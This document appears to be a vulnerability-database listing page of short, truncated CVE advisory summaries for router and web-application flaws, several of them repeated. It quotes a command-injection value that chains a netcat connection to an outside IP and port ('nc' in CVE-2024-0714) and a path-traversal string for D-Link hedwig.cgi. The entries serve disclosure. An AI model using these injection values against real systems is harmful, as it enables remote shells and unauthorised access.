PT-2024-1397 · Trendnet · Trendnet Tew-822Dre

Name of the Vulnerable Software and Affected Versions: TRENDnet TEW-822DRE version 1.03B02 Description: A critical issue affects the file /admin ping.htm of the component POST Request Handler. The manipulation of the ipv4 ping/ipv6 ping argument leads to command injection. This can be initiated...

PT-2024-1396 · Trendnet · Trendnet Tew-800Mb

Name of the Vulnerable Software and Affected Versions: TRENDnet TEW-800MB version 1.0.1.0 Description: A critical issue was found in the component POST Request Handler, where the manipulation of the DeviceURL argument leads to os command injection. This allows an attacker to execute arbitrary...

CVE-2024-0885

A vulnerability classified as problematic has been found in SpyCamLizard 1.230. Affected is an unknown function of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and ma...

CVE-2024-0885

A vulnerability classified as problematic has been found in SpyCamLizard 1.230. Affected is an unknown function of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and ma...

PT-2024-15890 · Unknown · Spycamlizard

Name of the Vulnerable Software and Affected Versions: SpyCamLizard version 1.230 Description: A vulnerability has been found in the HTTP GET Request Handler component of SpyCamLizard, affecting an unknown function. This issue leads to denial of service and can be exploited remotely. The exploit...

CVE-2024-0769

CVE-2024-0769 corresponds to a path-traversal vulnerability in D-Link DIR-859 routers (affected file: /hedwig.cgi). Connected sources confirm the issue is triggered by manipulating the service argument with ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml, enabling remote access. The affected...

CVE-2024-0733

A vulnerability was found in Smsot up to 2.12. It has been classified as critical. Affected is an unknown function of the file /api.php of the component HTTP POST Request Handler. The manipulation of the argument datasign leads to sql injection. It is possible to launch the attack remotely. The...

Sql injection

A vulnerability was found in Smsot up to 2.12. It has been classified as critical. Affected is an unknown function of the file /api.php of the component HTTP POST Request Handler. The manipulation of the argument datasign leads to sql injection. It is possible to launch the attack remotely. The...

CVE-2024-0733

CVE-2024-0733 affects Smsot up to version 2.12, impacting the HTTP POST Request Handler in /api.php where manipulating the data[sign] parameter enables SQL injection. This is a remote, unauthenticated condition that can compromise confidentiality, integrity, and availability as indicated by CVSS ...

CVE-2024-0717

A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853,...

CVE-2024-0718

A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The...

CVE-2024-0718

A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The...

CVE-2024-0717

Affects a wide range of D-Link devices (e.g., DAP-1360, DIR-300, DIR-615, DIR-620, DVG-series, Good Line Router v2, and others) with the vulnerability residing in the HTTP GET Request Handler for /devinfo. The underlying issue is improper handling of the area parameter, where input such as notice...

CVE-2024-0714

A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 ...

CVE-2024-0714

A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 ...

Command injection

A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 ...

CVE-2024-0714

MiczFlor RPi-Jukebox-RFID

PT-2024-15775 · Unknown · Miczflor Rpi-Jukebox-Rfid

Name of the Vulnerable Software and Affected Versions: MiczFlor RPi-Jukebox-RFID versions up to 2.5.0 Description: A critical issue affects some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc...

PT-2024-15777 · Unknown · Liuwy-Dlsdys Zhglxt

Name of the Vulnerable Software and Affected Versions: liuwy-dlsdys zhglxt version 4.7.7 Description: A problematic issue has been found in the HTTP POST Request Handler component, affecting the processing of the file /oa/notify/edit. The manipulation of the notifyTitle argument leads to cross-si...

CVE-2024-0695

A vulnerability, which was classified as problematic, has been found in EFS Easy Chat Server 3.1. Affected by this issue is some unknown functionality of the component HTTP GET Request Handler. The manipulation of the argument USERNAME leads to denial of service. The attack may be launched...